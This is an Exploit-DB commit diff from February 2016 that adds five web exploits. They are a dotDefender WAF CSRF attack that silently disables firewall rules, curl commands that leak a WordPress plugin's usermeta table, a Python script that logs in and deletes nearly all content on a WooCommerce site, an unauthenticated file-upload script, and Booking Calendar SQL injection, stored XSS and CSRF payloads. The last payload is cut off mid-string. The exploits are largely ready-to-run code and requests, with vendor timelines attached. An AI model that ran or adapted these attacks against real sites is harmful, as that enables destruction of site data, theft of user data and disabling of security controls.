DB: 2016-02-09

5 new exploits

files.csv

@@ -9748,7 +9748,7 @@ id,file,description,date,author,platform,type,port
 10485,platforms/php/webapps/10485.txt,"Drupal Sections Module XSS Vulnerability",2009-12-16,"Justin C. Klein Keane",php,webapps,0
 14034,platforms/windows/dos/14034.pl,"Wincalc 2 - (.num) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0
 10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 vccleaner Root Vulnerability",2009-12-16,"Dominick LaTrappe",linux,local,0
-10488,platforms/php/webapps/10488.txt,"WP-Forum <= 2.3 - SQL Injection & Blind SQL Injection vulnerabilities",2009-12-16,"Juan Galiana Lara",php,webapps,0
+10488,platforms/php/webapps/10488.txt,"WP-Forum <= 2.3 - SQL Injection & Blind SQL Injection Vulnerabilities",2009-12-16,"Juan Galiana Lara",php,webapps,0
 10489,platforms/windows/dos/10489.txt,"Google Picasa 3.5 - Local DoS Buffer Overflow",2009-12-16,Connection,windows,dos,0
 10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System (auth bypass) SQL Injection Vulnerability",2009-12-16,R3d-D3V!L,php,webapps,0
 10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS SQL Injection Vulnerability",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
@@ -35657,3 +35657,8 @@ id,file,description,date,author,platform,type,port
 39415,platforms/php/webapps/39415.txt,"ATutor 2.2 - Multiple XSS Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80
 39416,platforms/php/webapps/39416.txt,"Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities",2016-02-04,"Sachin Wagh",php,webapps,80
 39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0
+39419,platforms/multiple/webapps/39419.txt,"dotDefender Firewall 5.00.12865 / 5.13-13282 - CSRF Vulnerability",2016-02-08,John,multiple,webapps,0
+39420,platforms/php/webapps/39420.txt,"WordPress User Meta Manager Plugin 3.4.6 - Information Disclosure",2016-02-08,"Panagiotis Vagenas",php,webapps,80
+39421,platforms/php/webapps/39421.py,"WordPress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80
+39422,platforms/php/webapps/39422.py,"WordPress WP User Frontend Plugin < 2.3.11 - Unrestricted File Upload",2016-02-08,"Panagiotis Vagenas",php,webapps,80
+39423,platforms/php/webapps/39423.txt,"WordPress Booking Calendar Contact Form Plugin <= 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",php,webapps,80

platforms/multiple/webapps/39419.txt

@@ -0,0 +1,228 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/DOT-DEFENDER-CSRF.txt
+
+
+Vendor:
+==================
+www.applicure.com
+
+
+Product:
+=====================
+dotDefender Firewall
+Versions: 5.00.12865 / 5.13-13282
+
+
+dotDefender is a Web application firewall (WAF) for preventing hacking
+attacks like XSS, SQL Injections, CSRF etc...
+that provides Apache and IIS Server Security across Dedicated, VPS and
+Cloud environments. It meets PCI Compliance and also
+provides E-Commerce Security, IIS and Apache Security, Cloud Security and
+more.
+
+
+Vulnerability Type:
+=================================
+Cross Site Request Forgery - CSRF
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+Dotdefender firewall (WAF) is vulnerable to cross site request forgery,
+this allows attackers to make HTTP requests via the victims browser to
+the dotdefender management server on behalf of the victim if the victim is
+logged in and visits a malicious web page or clicks an infected link.
+Result can be modifying or disabling various firewall patterns,
+User-Defined Rule settings and global event logging etc...
+
+
+HTTP requests sent to Dotdefender to enable or disable user-Defined rule
+settings are base64 encoded using SOAP protocol.
+Sending the below base64 value for example disables a Dotdefender firewall
+setting.
+
+PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
+<enabled>false</enabled>
+
+
+Tested successfully on Windows & Linux:
+
+dotDefender Version:          5.00.12865
+Web Server Type:              Microsoft-IIS
+Server Operating System:      Windows
+Web Server Version:           7.5
+Firefox web browser
+
+
+dotDefender Version:     5.13-13282
+Web Server Type:     Apache
+Server Operating System:     Linux
+
+
+Exploit code(s):
+===============
+
+Example to send requests to disable firewall rule settings that defends
+against SQL injection.
+We need to send two requests first to modify the desired settings and
+second to commit our changes.
+
+
+HTTP request 0x01 - send following soap request to disable SQL Injection
+request firewall rule
+~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
+
+<IFRAME style="display:none" name="demonica"></IFRAME>
+
+<form target="demonica" id="SACRIFICIAL" action="
+http://localhost/dotDefender/dotDefenderWS.exe" ENCTYPE="text/plain"
+ method="post" onsubmit="TORMENT()">
+<input type="hidden" name='<soapenv:Envelope xmlns:xsi="
+http://www.w3.org/2001/XMLSchema-instance"
+ xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+ xmlns:ZSI="http://www.zolera.com/schemas/ZSI/"
+ xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
+ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
+ xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+ soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+ <soapenv:Body xmlns:ns1="http://applicure.com/dotDefender">
+ <ns1:set_xpath><site xsi:type="xsd:string">0</site>
+ <xpath
+xsi:type="xsd:string">/ud_rules/request_rules/request_rule[rule_id=1]/enabled</xpath>
+ <xml xsi:type="xsd:base64Binary">PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+</xml>
+ </ns1:set_xpath></soapenv:Body></soapenv:Envelope>'>
+<script>document.getElementById('SACRIFICIAL').submit()</script>
+</form>
+
+
+HTTP request 0x02 - send the next request to commit the changes
+~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
+
+<form target="demonica" id="VICTIM" action="
+http://localhost/dotDefender/dotDefenderWS.exe" ENCTYPE="text/plain"
+ method="post">
+<input type="hidden" name='<soapenv:Envelope xmlns:xsi="
+http://www.w3.org/2001/XMLSchema-instance"
+ xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+ xmlns:ZSI="http://www.zolera.com/schemas/ZSI/"
+ xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
+ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
+ xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+ soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+ <soapenv:Body xmlns:ns1="http://applicure.com/dotDefender"><ns1:commit>
+ <sites><element0 id="0" xsi:type="xsd:string">0</element0></sites>
+ </ns1:commit></soapenv:Body></soapenv:Envelope>'>
+<script>function
+TORMENT(){document.getElementById('VICTIM').submit()}</script>
+</form>
+
+
+
+Other SOAP payload examples for rule disabling:
+~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
+
+this is disable a rule #19, send the below request to disable remote IP
+protections:
+
+<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ZSI="
+http://www.zolera.com/schemas/ZSI/"
+xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="
+http://schemas.xmlsoap.org/soap/encoding/"
+xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+<soapenv:Body xmlns:ns1="http://applicure.com/dotDefender"><ns1:set_xpath><site
+xsi:type="xsd:string">0</site>
+<xpath
+xsi:type="xsd:string">/ud_rules/request_rules/request_rule[rule_id=19]/enabled</xpath>
+<xml
+xsi:type="xsd:base64Binary">PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+</xml></ns1:set_xpath></soapenv:Body></soapenv:Envelope>
+
+
+disable rule 20:
+~=~=~=~=~=~=~=~=
+
+<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+xmlns:ZSI="http://www.zolera.com/schemas/ZSI/" xmlns:SOAP-ENV="
+http://schemas.xmlsoap.org/soap/envelope/"
+xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:soapenv="
+http://schemas.xmlsoap.org/soap/envelope/"
+soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soapenv:Body
+xmlns:ns1="http://applicure.com/dotDefender">
+<ns1:set_xpath><site xsi:type="xsd:string">0</site><xpath
+xsi:type="xsd:string">/ud_rules/request_rules/request_rule[rule_id=20]/enabled</xpath>
+<xml
+xsi:type="xsd:base64Binary">PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+</xml></ns1:set_xpath></soapenv:Body></soapenv:Envelope>
+
+
+Finally commit them with below request:
+~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
+
+<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+xmlns:ZSI="http://www.zolera.com/schemas/ZSI/" xmlns:SOAP-ENV="
+http://schemas.xmlsoap.org/soap/envelope/"
+xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:soapenv="
+http://schemas.xmlsoap.org/soap/envelope/"
+soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soapenv:Body
+xmlns:ns1="http://applicure.com/dotDefender">
+<ns1:commit><sites><element0 id="0"
+xsi:type="xsd:string">0</element0></sites></ns1:commit></soapenv:Body></soapenv:Envelope>
+
+
+
+
+Disclosure Timeline:
+================================
+Vendor Notifications:
+
+initial report 11/16/2015
+vendor response 11/20/2015
+vendor delays for two months
+1/19/2016 Vendor finally acknowledges vulnerability
+inform vendor of a disclosure date
+vendor no longer responds
+Feb 8, 2016 : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+==================
+High
+
+
+Description:
+==========================================================
+
+Request Method(s):           [+] POST
+
+
+Vulnerable Product:          [+] DotDefender v5.0 & v5.13
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx

platforms/php/webapps/39420.txt

@@ -0,0 +1,45 @@
+* Exploit Title: WordPress User Meta Manager Plugin [Information Disclosure]
+* Discovery Date: 2015-12-28
+* Public Disclosure Date: 2016-02-01
+* Exploit Author: Panagiotis Vagenas
+* Contact: https://twitter.com/panVagenas
+* Vendor Homepage: http://jasonlau.biz/home/
+* Software Link: https://wordpress.org/plugins/user-meta-manager/
+* Version: 3.4.6
+* Tested on: WordPress 4.4
+* Category: webapps
+
+## Description
+
+User Meta Manager for WordPress plugin up to v3.4.6 suffers from a information disclosure vulnerability. Any registered user can perform an a series of AJAX 
+requests, in order to get all contents of `usermeta` DB table. 
+
+`usermeta` table holds additional information for all registered users. User Meta Manager plugin offers a `usermeta` table backup functionality. During the backup process the plugin takes no action in protecting the leakage of the table contents to unauthorized (non-admin) users.
+
+## PoC
+
+### Get as MySQL query
+
+First a backup table must be created
+
+ 
+curl -c ${USER_COOKIES} \
+    "http://${VULN_SITE}/wp-admin/admin-ajax.php\
+    ?action=umm_switch_action&umm_sub_action=umm_backup"
+
+
+Then we get the table with another request
+
+curl -c ${USER_COOKIES} \
+    "http://${VULN_SITE}/wp-admin/admin-ajax.php\
+    ?action=umm_switch_action&umm_sub_action=umm_backup&mode=sql"
+
+### Get as CSV file
+
+curl -c ${USER_COOKIES} \
+    "http://${VULN_SITE}/wp-admin/admin-ajax.php\
+    ?action=umm_switch_action&umm_sub_action=umm_get_csv"
+
+## Solution
+
+Upgrade to version 3.4.8

platforms/php/webapps/39421.py

@@ -0,0 +1,118 @@
+'''
+* Exploit Title: WordPress WooCommerce - Store Toolkit Plugin [Privilege Escalation]
+* Discovery Date: 2016-02-06
+* Public Disclosure Date: 2016-02-08
+* Exploit Author: Panagiotis Vagenas
+* Contact: https://twitter.com/panVagenas
+* Vendor Homepage: http://www.visser.com.au/
+* Software Link: https://wordpress.org/plugins/woocommerce-store-toolkit/
+* Version: 1.5.5
+* Tested on: WordPress 4.4.2
+* Category: webapps
+
+Description
+-----------
+
+The plugin "WooCommerce - Store Toolkit" for WordPress suffers from a privilege escalation vulnerability.
+
+An attacker must have a valid user account which is possible simply by registering to the infected website. This is possible because this plugin must be installed in a website with WooCommerce plugin to be any of use. Since WooCommerce is an e-store plugin allows user registration by default, so we assume that all websites that have the "WooCommerce - Store Toolkit" plugin are also open to user registration.
+
+As long as an attacker have an active account at the infected website he can perform the attack at ease because no action validation is taking place from the "WooCommerce - Store Toolkit" plugin. The "WooCommerce - Store Toolkit" plugin is designed to perform a set of actions like:
+
+- Permanently delete all posts, post categories and post tags
+- Permanently delete all media (attachments)
+- Permanently delete all products, product categories, product tags and attributes
+- Permanently delete all orders
+- Permanently delete all comments
+
+All these actions they normally require administrative wrights. But in this case any registered user can perform these actions, even with the most limited wrights, therefor this issue is considered as an Privilege Escalation vulnerability.
+
+PoC
+---
+
+The following script will nuke nearly all site content from `example.com` using the account with username:`username` and password:`password`. This has to be an already registered account for this to work.
+''' 
+
+#!/usr/bin/python3
+
+################################################################################
+# WooCommerce - Store Toolkit Privilege Escalation Exploit
+#
+# **IMPORTANT** Don't use this in a production site, if vulnerable it will
+# delete nearly all your site content
+#
+# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
+################################################################################
+
+import requests
+
+loginUrl = 'http://example.com/wp-login.php'
+adminUrl = 'http://example.com/wp-admin/index.php'
+
+loginPostData = {
+    'log': 'username',
+    'pwd': 'password',
+    'rememberme': 'forever',
+    'wp-submit': 'Log+In'
+}
+
+l = requests.post(loginUrl, data=loginPostData)
+
+if len(l.history) > 1:
+    loggedInCookies = l.history[0].cookies
+else:
+    loggedInCookies = l.cookies
+
+if len(loggedInCookies) == 0:
+    print("Couldn't acquire a valid session")
+    exit(1)
+
+actions = [
+    'woo_st_products',
+    'woo_st_categories',
+    'woo_st_product_categories',
+    'woo_st_product_tags',
+    'woo_st_product_brands',
+    'woo_st_product_vendors',
+    'woo_st_product_images',
+    'woo_st_coupons',
+    'woo_st_attributes',
+    'woo_st_sales_orders',
+    'woo_st_tax_rates',
+    'woo_st_download_permissions',
+    'woo_st_creditcards',
+    'woo_st_google_product_feed',
+    'woo_st_posts',
+    'woo_st_post_categories',
+    'woo_st_post_tags',
+    'woo_st_links',
+    'woo_st_comments',
+    'woo_st_media_images'
+]
+
+for action in actions:
+    print('Trying action '+action)
+    a = requests.post(adminUrl, data={'action': 'nuke', action:1}, cookies=loggedInCookies, timeout=30)
+    if a.status_code == 200:
+        print('Nuked with action '+action)
+    else:
+        print('Something went wrong with action '+action)
+
+exit(0)
+
+'''
+Solution
+--------
+
+Upgrade to v1.5.7
+
+Timeline
+--------
+
+1. 2016-02-07: Vendor notified through WordPress support forums
+2. 2016-02-07: Vendor notified through his homepage support
+3. 2016-02-07: Requested CVE ID
+4. 2016-02-07: Vendor responded
+5. 2016-02-07: Send issue details to vendor
+6. 2016-02-08: Vendor released version 1.5.7 which resolves this issue
+'''

platforms/php/webapps/39422.py

@@ -0,0 +1,74 @@
+'''
+* Exploit Title: WordPress WP User Frontend Plugin [Unrestricted File Upload]
+* Discovery Date: 2016-02-04
+* Public Disclosure: 2016-02-08
+* Exploit Author: Panagiotis Vagenas
+* Contact: https://twitter.com/panVagenas
+* Vendor Homepage: https://wedevs.com
+* Software Link: https://wordpress.org/plugins/wp-user-frontend
+* Version: < 2.3.11
+* Tested on: WordPress 4.4.2
+* Category: WebApps, WordPress
+
+
+Description
+-----------
+
+WordPress plugin _WP User Frontend_ suffers from an unrestricted file uploade vulnerability. An attacker can exploit the `wpuf_file_upload` or `wpuf_insert_image` actions to upload any file which pass the WordPress mime and size checks.
+
+The attack does not require any privilege to be performed. The mentioned actions are available to non-privileged users also, thus allowing to anyone uploading files to the web server.
+
+PoC
+---
+'''
+ 
+
+#!/usr/bin/python3
+
+################################################################################
+# WP User Frontend unrestricted file upload exploit
+#
+# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
+################################################################################
+
+import requests
+import tempfile
+
+url = 'http://example.com/wp-admin/admin-ajax.php'
+
+postData = {
+    'action': 'wpuf_file_upload'
+}
+
+file = tempfile.NamedTemporaryFile(mode='a+t', suffix='.jpeg')
+
+file.write('A'*32)
+
+file.seek(0)
+
+files = {'wpuf_file': file}
+
+r = requests.post(url, data=postData, files=files)
+
+file.close()
+
+if r.text != 'error':
+    print('Success!')
+    print(r.text)
+else:
+    print('error')
+
+exit(0)
+
+'''
+Timeline
+--------
+
+1. **2016-02-04**: Vendor notified via support forums in WordPress.org
+2. **2016-02-05**: Vendor responded
+3. **2016-02-05**: Issue details send to vendor
+4. **2016-02-06**: Requested CVE ID
+5. **2016-02-06**: Vendor implemented security checks
+6. **2016-02-06**: Verified that this exploit is no longer valid
+7. **2016-02-08**: Vendor released v2.3.11 which resolves this issue
+'''

platforms/php/webapps/39423.txt

@@ -0,0 +1,260 @@
+# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection
+# Date: 2016-02-08
+# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
+# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
+# Vendor Homepage: http://wordpress.dwbooster.com/
+# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
+# Version: 1.0.23
+# Tested on: windows 10 + firefox. 
+
+==============
+ Description
+==============
+
+Create a booking form with a reservation calendar or a classic contact form, connected to 
+a PayPal payment button.
+With the **Booking Calendar Contact Form** you can create a **classic contact form** or a 
+**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation 
+calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.
+
+The **reservation calendar** is an optional item, so it can be disabled to create a **general 
+purpose contact form**.
+
+There are two types of bookings available in the calendar configuration: full day bookings or 
+partial day bookings. With full day bookings the whole day is blocked / reserved while in partial 
+day bookings the start and end dates are partially blocked as used for example in 
+**room/hotel bookings**.
+
+===================
+ Technical details 
+===================
+
+Booking calendar plugin  is prone to a blind sql injection because fails to sanitize a 
+parameter used into a sql statement. 
+The function ´dex_bccf_get_option´ uses a variable called ´CP_BCCF_CALENDAR_ID´ which is not sanitized
+and is used as value for the ´id´ of sql parameter.
+The vulnerable function is called into many other functions, and one of those is ´dex_bccf_calendar_load2´ 
+which sets the ´CP_BCCF_CALENDAR_ID´ with the following code:
+
+""
+$calid = str_replace(TDE_BCCFCAL_PREFIX, "", @$_GET["id"]);
+    if (!defined('CP_BCCF_CALENDAR_ID') && $calid != '-1')
+        define('CP_BCCF_CALENDAR_ID', $calid);
+""
+
+and then the function ´dex_bccf_get_option´ is called into ´dex_bccf_calendar_load2´ function:
+
+"" ...
+$option = dex_bccf_get_option('calendar_overlapped', DEX_BCCF_DEFAULT_CALENDAR_OVERLAPPED);
+   ...
+""
+
+The ´dex_bccf_calendar_load2´ function is called when we request the next url:
+
+http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent
+&dex_bccf_calendar_load2=list&id=<SQLI commands>
+
+A malicious unauthenticated user can exploit the sql injection and obtain all records from database.
+
+==================
+ Proof of concept
+==================
+
+http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent
+&dex_bccf_calendar_load2=list&id=1%20and%20sleep(10)
+
+###############################################################################
+
+# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection
+# Date: 2016-02-08
+# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
+# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
+# Vendor Homepage: http://wordpress.dwbooster.com/
+# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
+# Version: 1.0.23
+# Tested on: windows 10 + firefox.
+
+==============
+ Description
+==============
+
+Create a booking form with a reservation calendar or a classic contact form, connected to
+a PayPal payment button.
+With the **Booking Calendar Contact Form** you can create a **classic contact form** or a
+**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation
+calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.
+
+The **reservation calendar** is an optional item, so it can be disabled to create a **general
+purpose contact form**.
+
+There are two types of bookings available in the calendar configuration: full day bookings or
+partial day bookings. With full day bookings the whole day is blocked / reserved while in partial
+day bookings the start and end dates are partially blocked as used for example in
+**room/hotel bookings**.
+
+===================
+ Technical details
+===================
+
+Booking calendar plugin  is prone to a blind sql injection in the shortcode function ´dex_bccf_filter_content´
+because there is not sanitization when the variable ´DEX_BCCF_CALENDAR_FIXED_ID´ is asigned and then is used
+into function ´dex_bccf_get_public_form()´.
+
+function dex_bccf_filter_content($atts) {
+...
+    extract(shortcode_atts(array(
+        'calendar' => '',
+        'user' => '',
+                    ), $atts));
+    if ($calendar != '')
+        define('DEX_BCCF_CALENDAR_FIXED_ID', $calendar);
+    ..
+
+    return $buffered_contents;
+}
+
+
+function dex_bccf_get_public_form() {
+    global $wpdb;
+
+    if (defined('DEX_CALENDAR_USER') && DEX_CALENDAR_USER != 0)
+        $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE conwer=" . DEX_CALENDAR_USER);
+    else if (defined('DEX_BCCF_CALENDAR_FIXED_ID'))
+        $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE id=" . DEX_BCCF_CALENDAR_FIXED_ID);
+    else
+        $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME);
+ ...
+ }
+
+
+==================
+ Proof of concept
+==================
+
+An editor/author can add a ahortcode with his sql command into a post:
+
+
+[CP_BCCF_FORM calendar=-1 or sleep(10)#]
+
+###############################################################################
+
+# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Privilege escalation / stored XSS vulnerabilities
+# Date: 2016-02-08
+# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
+# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
+# Vendor Homepage: http://wordpress.dwbooster.com/
+# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
+# Version: 1.0.23
+# Tested on: windows 10 + firefox.
+
+==============
+ Description
+==============
+
+Create a booking form with a reservation calendar or a classic contact form, connected to
+a PayPal payment button.
+With the **Booking Calendar Contact Form** you can create a **classic contact form** or a
+**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation
+calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.
+
+The **reservation calendar** is an optional item, so it can be disabled to create a **general
+purpose contact form**.
+
+There are two types of bookings available in the calendar configuration: full day bookings or
+partial day bookings. With full day bookings the whole day is blocked / reserved while in partial
+day bookings the start and end dates are partially blocked as used for example in
+**room/hotel bookings**.
+
+===================
+ Technical details
+===================
+
+Booking calendar contact form plugin for wordpress is prone to multiple privilege escalation and stored XSS
+vulnerabilities because does not verify if a user that make a request for update the plugin options,
+add or delete a ´season price´ and add/delete/update an item to booking list is a privileged user and does not
+sanitize the supplied information.
+
+An authenticated user can exploit these vulnerabilities.
+
+==================
+ Proof of concept
+==================
+
+1) Add a ´season price´ with XSS Payload in parameter ´price´.
+
+http://<wp-path>/<ap-path>/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices
+&add=1&dex_item=1&price=%3E%22%3Cimg%20src=x%20onerror=alert(/u_r_owned/)%3E%22%3C&dfrom=&dto
+
+2) Delete a ´season price´ with specified ´code´
+
+http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data
+&dex_bccf=loadseasonprices&delete=1&code=1
+
+
+3) Own a calendars if you have an account like ´suscriptor´ role and inject a XSS payload into ´name parameter´:
+http://<wp-hots>/<wp-path>/wp-admin/admin.php?page=dex_bccf.php&u=<my user id>&public=1&owner=1&name=<XSS payload>
+
+
+4) Update charset of booking calendar tables:
+http://<wp-host>/<wp-path>/wp-admin/admin.php?page=dex_bccf.php&ac=st&chs=<my supplied charset>
+
+
+5) Delete a booking calendar item if you are logged in as suscriptor:
+http://localhost/wordpress/wp-admin/admin.php?page=dex_bccf.php&cal=1&list=1&ld=<id of calendar to delete>
+
+
+6)  Unrestricted update options / stored XSS in some parameters ( PoC html )
+
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin
+
+email_confirmation_to_user,calendar_language,calendar_mode,calendar_pages,currency,cv_text_enter_valid_captcha
+ and other parameters are vulnerables to stored XSS
+
+url_ok,url_cancel can be used to redirect a user and make fishing attacks
+´dex_item´  value is the ´id´ of the calendar.
+   -->
+<body>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://localhost:80/wordpress/wp-admin/admin.php?page=dex_bccf.php&cal=1&r=0.5076911114737157", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
+        xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
+        xhr.withCredentials = true;
+        var body = "dex_bccf_post_options=1&dex_item=1&calendar_enabled=true&selDay_startcal1=&selMonth_startcal1=&selYear_startcal1=&selDay_endcal1=&selMonth_endcal1=&selYear_endcal1=\">\"<img><\"&calendar_pages=2&calendar_language=\">\"<img><\"&calendar_weekday=0&calendar_dateformat=0&calendar_overlapped=false&calendar_showcost=1&calendar_mode=\">\"<img><\"&calendar_mindate=today&calendar_maxdate=\">\"<img><\"&calendar_minnights=%22%3E%22%3Cimg%3E%3C%22&calendar_maxnights=%22%3E%22%3Cimg%3E%3C%22&wd1=1&wd2=1&wd3=1&wd4=1&wd5=1&wd6=1&wd7=1&sd1=1&sd2=1&sd3=1&sd4=1&sd5=1&sd6=1&sd7=1&calendar_fixedreslength=1&calendar_holidays=&calendar_startres=&currency=%22%3E%22%3Cimg%3E%3C%22&request_cost=%22%3E%22%3Cimg%3E%3C%22&max_slots=0&calendar_suplementminnight=%22%3E%22%3Cimg%3E%3C%22&calendar_suplementmaxnight=%22%3E%22%3Cimg%3E%3C%22&calendar_suplement=%22%3E%22%3Cimg%3E%3C%22&calendar_depositenable=0&calendar_depositamount=0&calendar_deposittype=0&dex_dc_price=%22%3E%22%3Cimg%3E%3C%22&dex_dc_season_dfrom=%22%3E%22%3Cimg%3E%3C%22&dex_dc_season_dto=%22%3E%22%3Cimg%3E%3C%22&paypal_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com&paypal_product_name=%22%3E%22%3Cimg%3E%3C%22&url_ok=http%3A%2F%2Flocalhost%2Fwordpress&url_cancel=http%3A%2F%2Flocalhost%2Fwordpress&paypal_language=%22%3E%22%3Cimg%3E%3C%22&request_taxes=%22%3E%22%3Cimg%3E%3C%22&form_structure=%5B%5B%7B%22name%22%3A%22email%22%2C%22index%22%3A0%2C%22title%22%3A%22Email%22%2C%22ftype%22%3A%22femail%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22required%22%3Atrue%2C%22predefined%22%3A%22%22%2C%22size%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22subject%22%2C%22index%22%3A1%2C%22title%22%3A%22Subject%22%2C%22required%22%3Atrue%2C%22ftype%22%3A%22ftext%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22predefined%22%3A%22%22%2C%22size%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22message%22%2C%22index%22%3A2%2C%22size%22%3A%22large%22%2C%22required%22%3Atrue%2C%22title%22%3A%22Message%22%2C%22ftype%22%3A%22ftextarea%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22predefined%22%3A%22%22%7D%5D%2C%5B%7B%22title%22%3A%22%22%2C%22description%22%3A%22%22%2C%22formlayout%22%3A%22top_aligned%22%7D%5D%5D&sTitle=Email&sShortlabel=&sNametag=%3C%25email%25%3E&sName=email&sSize=medium&sRequired=on&sEqualTo=&sPredefined=&sUserhelp=&sCsslayout=&vs_text_submitbtn=%22%3E%22%3Cimg%3E%3C%22&vs_text_previousbtn=%22%3E%22%3Cimg%3E%3C%22&vs_text_nextbtn=%22%3E%22%3Cimg%3E%3C%22&vs_use_validation=DEX_BCCF_DEFAULT_vs_use_validation&vs_text_is_required=This+field+is+required.&vs_text_is_email=%22%3E%22%3Cimg%3E%3C%22%40mail.com&cv_text_enter_valid_captcha=Please+enter+a+valid+captcha+code.&vs_text_datemmddyyyy=%22%3E%22%3Cimg%3E%3C%22&vs_text_dateddmmyyyy=%22%3E%22%3Cimg%3E%3C%22&vs_text_number=%22%3E%22%3Cimg%3E%3C%22&vs_